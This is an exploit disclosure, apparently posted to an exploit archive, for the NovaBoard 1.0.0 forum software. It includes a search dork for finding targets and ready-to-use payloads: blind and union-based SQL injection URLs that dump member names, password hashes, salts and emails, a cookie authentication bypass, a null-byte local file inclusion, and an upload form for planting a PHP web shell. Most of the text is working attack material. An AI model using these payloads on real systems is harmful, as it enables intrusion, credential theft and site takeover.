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NovaBoard 1.0.0 Multiple Remote Vulnerabilities
=============================================== NovaBoard 1.0.0 Multiple Remote Vulnerabilities =============================================== =============================================================================================== Found : brain[pillow] Dork : "Powered by NovaBoard v1.0.0" =============================================================================================== -- [ blind sql-inj ]: /index.php?page=search&search=xe&author_id=&author=&startdate=&enddate=&forums%5B%5D=&pf=1&topic=1'+union+select+1,2,3,4,5,6,7,8,9+from+novaboard_posts+where+1='2 Need: magic quotes = off =============================================================================================== -- [ standart sql-inj ]: /index.php?forum=2'+union+select+1,2,concat_ws('%20|%20',name,password,pass_salt,email)+from+novaboard_members+where+1='1 Need: magic quotes = off Note: $password= md5($password . $pass_salt); =============================================================================================== -- [ sql-inj in auth ]: COOKIES: nova_name=admin'#; nova_password=1c20a3e48e3b6607fedded430a20f606 Need: magic quotes = off =============================================================================================== -- [ local include ]: /uploads/upload.php Cookie: nova_lang=../index.php%00 Need: 1) no cookie "nova_name" in your browser. 2) magic quotes = off =============================================================================================== -- [ shell upload ]: <form enctype='multipart/form-data' method='post' action='http://localhost/_BOARD_PATH_/uploads/uploader.php'> <input type='hidden' name='MAX_FILE_SIZE' value='100000000000' /> <input type='hidden' name='topicid' value='' /> <input type='hidden' name='member' value='' /> <input type='hidden' name='attachtype' value='' /> <input type='hidden' name='hash' value='31337' /> <input type='hidden' name='attachtype' value='attachments' /> <input type='file' name='uploadedfile'> <input type='submit' value='Upload' /> </form> Note: Must upload file "shell.php.anything.rar" and then have fun here: http://localhost/_BOARD_PATH_/uploads/attachments/31337shell.php.anything.rar Need: attachments allowed =============================================================================================== # 0day.today [2024-12-27] #